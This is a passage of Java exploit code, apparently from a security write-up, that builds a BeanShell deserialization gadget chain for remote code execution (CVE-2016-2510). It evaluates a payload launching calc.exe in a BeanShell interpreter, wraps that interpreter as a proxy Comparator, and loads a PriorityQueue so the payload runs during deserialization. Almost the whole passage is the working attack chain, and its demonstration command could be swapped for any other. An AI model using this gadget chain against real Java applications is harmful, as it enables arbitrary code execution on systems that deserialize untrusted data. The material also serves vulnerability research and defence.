"new java.lang.ProcessBuilder(new String[]{\"calc.exe\"}).start();return 1;}"; // Create BeanShell Interpreter Interpreter i = new Interpreter(); i.eval(payload); // Create Proxy/InvocationHandler to be a "Comparator" using Interpreter XThis xt = new XThis(i.getNameSpace(), i); InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt); Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class<?>[]{Comparator.class}, handler); // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) PriorityQueue<Object> priorityQueue = new PriorityQueue<>(2, comparator); Object[] queue = new Object[] {1,1}; setFieldValue(priorityQueue, "queue", queue); setFieldValue(priorityQueue, "size", 2); RCE gadget in BeanShell (CVE-2016-2510)